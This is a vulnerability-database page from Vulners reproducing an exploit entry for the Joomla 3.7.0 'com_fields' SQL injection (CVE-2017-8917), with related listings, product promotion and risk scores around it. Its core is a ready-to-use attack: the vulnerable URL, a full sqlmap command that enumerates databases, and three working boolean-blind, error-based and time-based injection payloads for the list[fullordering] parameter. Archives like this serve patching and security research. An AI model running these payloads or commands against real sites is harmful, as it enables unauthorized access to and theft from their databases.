Vulners
Lucene search
Joomla! 3.7.0 - 'com_fields' SQL Injection
| Reporter | Title | Published | Views | Family All 40 |
|---|---|---|---|---|
 | Exploit for Improper Input Validation in Joomla Joomla\! | 23 Feb 201812:32 | – | gitee |
| Exploit for OS Command Injection in Gnu Bash | 27 Jul 202504:29 | – | gitee |
| Exploit for Improper Input Validation in Joomla Joomla\! | 13 Sep 202011:52 | – | gitee |
| Exploit for Improper Input Validation in Joomla Joomla\! | 21 Oct 202022:39 | – | gitee |
| Exploit for Improper Input Validation in Joomla Joomla\! | 11 Mar 202001:42 | – | gitee |
| Exploit for Improper Input Validation in Joomla Joomla\! | 9 Oct 201917:20 | – | gitee |
| Exploit for Improper Input Validation in Joomla Joomla\! | 26 May 202023:42 | – | gitee |
| Exploit for Improper Input Validation in Joomla Joomla\! | 27 Jul 202503:43 | – | gitee |
 | Joomla 3.7.0 - com_fields SQL Injection Vulnerability | 20 May 201700:00 | – | zdt |
| Joomla Fields Component - SQL Injection Remote Code Execution Exploit | 29 Mar 201800:00 | – | zdt |
10
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 May 2017 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 39.8
EPSS0.94513